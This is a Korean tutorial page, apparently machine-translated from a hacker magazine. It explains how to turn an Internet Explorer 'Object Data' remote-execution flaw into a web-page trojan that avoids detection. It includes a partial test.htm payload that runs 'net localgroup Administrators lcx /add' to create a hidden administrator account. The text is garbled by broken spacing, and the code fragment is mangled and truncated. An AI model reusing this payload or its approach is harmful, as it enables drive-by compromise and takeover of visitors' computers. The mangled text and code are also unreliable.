원 발 해커 x 파일 8 기,판권 은 잡지 소유.인터넷 익스플로러 Object Data 구멍 을 이용 하여 새로운 웹 페이지 목마 lcx 를 만 들 었 다.마이크로소프트 는 올해 8 월 20 일 최고 심각 등급 의 중요 한 구멍 인 인터넷 익스플로러 Object 데이터 원 격 실행 구멍 을 발표 했다.이것 은 홈 페이지 목마 애호가 들 에 게 는 좋 은 일이 다.우 리 는 이 구멍 으로 당분간 조사 되 지 않 을 새로운 목 마 를 만 들 수 있다.이 새로운 홈 페이지 목 마 를 만 드 는 방법 을 소개 하기 전에 제 가 먼저 이 구멍 을 간단하게 소개 하 겠 습 니 다.1.구멍 설명 이 구멍 내 에 eEye Digital Security 가 발견 하고 8 월 20 일 에 발표 한 것 으로 마이크로소프트 는 같은 날 에 도 해당 하 는 공 고 를 발표 했다.eEye 홈 페이지 게시 페이지:http://www.eeye.com/html/Research/Advisories/AD20030820.html이 문서 에 서 는 Microsoft Internet Explorer 가 웹 브 라 우 저 로 유행 하고 있 으 며,Internet Explorer 가 처리 대상 인'Object'표 시 를 할 때 불 러 올 파일 인 자 를 제대로 처리 하지 않 았 다 고 언급 했다.'Object"HTML 페이지 에 ActiveX 구성 요소 등 대상 을 삽입 하 는 데 사 용 됩 니 다."Object 가"표시 하 는"Type"속성 은 대상 의 MIME 형식 을 설정 하거나 가 져 오 는 데 사 용 됩 니 다.일반적으로 합 법 적 인 MIME 유형 은'plain/text'나'application/hta','audio/x-mpeg'등 을 포함한다.Internet Explorer 가 원 격 대상 데이터 위 치 를 지정 하 는 매개 변 수 는 불 러 온 파일 속성 을 충분히 검사 하지 않 았 습 니 다.공격 자 는 악성 페이지 를 구축 하여 악성 페이지 가 지정 한 프로그램 을 실행 하도록 유도 할 수 있 습 니 다.Windows 2003 Internet Explorer 는'Enhanced Security Configuration Mode'모드 를 사 용 했 기 때문에 기본적으로'Disable ActiveX'를 사 용 했 기 때문에 이 구멍 은 Windows 2003 IE 단계 에서 중간 입 니 다.이 묘 사 는 매우 전문 적 이지 만 알 아 볼 수 없 는 채소 새 는 뛰 어 넘 고 직접 만 드 는 방법 을 배 울 수 있다.:-)둘째,영향 을 받 은 시스템 버 전 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.5 SP2microsoft Internet Explorer 5.5 SP1 Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 5.0.1 SP3 Microsoft Internet Explorer 5.0.1 SP3 Microsoft Internet Explorer 5.0.1 SP2 microsoft Internet Explorer 5.0.1SP1 Microsoft Internet Explorer 6.0SP1-Microsoft Windows XP - Microsoft Windows NT 4.0 - Microsoft Windows ME - Microsoft Windows 98 SE - Microsoft Windows 98 - Microsoft Windows 95 - Microsoft Windows 2003 Web Edition - Microsoft Windows 2003 Standard Edition - Microsoft Windows 2003 Enterprise Edition 64-bit - Microsoft Windows 2003 Enterprise Edition - Microsoft Windows 2003 Datacenter Edition 64-bit -Microsoft Windows 2003 Datacenter Edition-Microsoft Windows 2000 3,빈틈 이용 상세 한 방법 근거http://www.eeye.com/html/Research/Advisories/AD20030820.html이 페이지 의 힌트 를 나 는 두 개의 간단 한 테스트 페이지 를 썼 다.코드 와 주석 을 먼저 보 세 요.제 가 다시 설명 하 겠 습 니 다.test.htm 코드 시작------html>body>테스트 페이지 입 니 다.시스템 이 w2k 또는 xp 라면 방문 후 lcx 비밀 번 호 를 추가 합 니 다.lcxlcx 의 관리 사용자------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------0)b=wshshell.run("cmd.exe/c net localgroup Administrators lcx/add",0)'이것 은 lcx 비밀 번 호 를 추가 한 lcxlcx 의 관리 사용자 입 니 다.
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
